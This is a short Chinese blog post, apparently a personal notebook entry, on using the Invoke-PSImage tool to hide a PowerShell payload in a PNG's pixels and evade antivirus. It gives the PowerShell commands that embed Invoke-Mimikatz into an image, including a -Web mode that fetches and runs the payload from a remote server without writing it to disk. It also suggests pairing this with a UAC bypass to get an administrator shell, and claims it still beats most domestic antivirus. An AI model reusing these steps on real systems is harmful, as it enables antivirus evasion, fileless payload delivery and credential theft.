分类 网络安全 下的文章

Invoke-PSImage bypass anti-virus

https://github.com/peewpw/Invoke-PSImage

通过对png的像素快中插入powershell代码来隐藏payload。在通过ps的功能将png中的payload读取并执行。
文章在网上有很多人已经写了如何使用以及原理,所以本文只是自己做记录,日后也能想起我到底都做了什么。

PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-kiwi.png


PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-kiwi.png -Web

图片1.png
Cs自带生成的ps1已经被查杀了。
存在两种使用方法,第一种是将生成的png上传到目标主机,然后再执行命令。
第二种是生成png后命令采取请求远程web服务器下载缓存图片并执行,可以实现无文件落地。

图片2.png
图片3.png
可以看到已经执行了payload,如果能够配合passuac的话,就可以通过无文件落地+管理员权限执行shell。
尽管是两年前的技术,但是还是能绕过大部分的国内杀毒。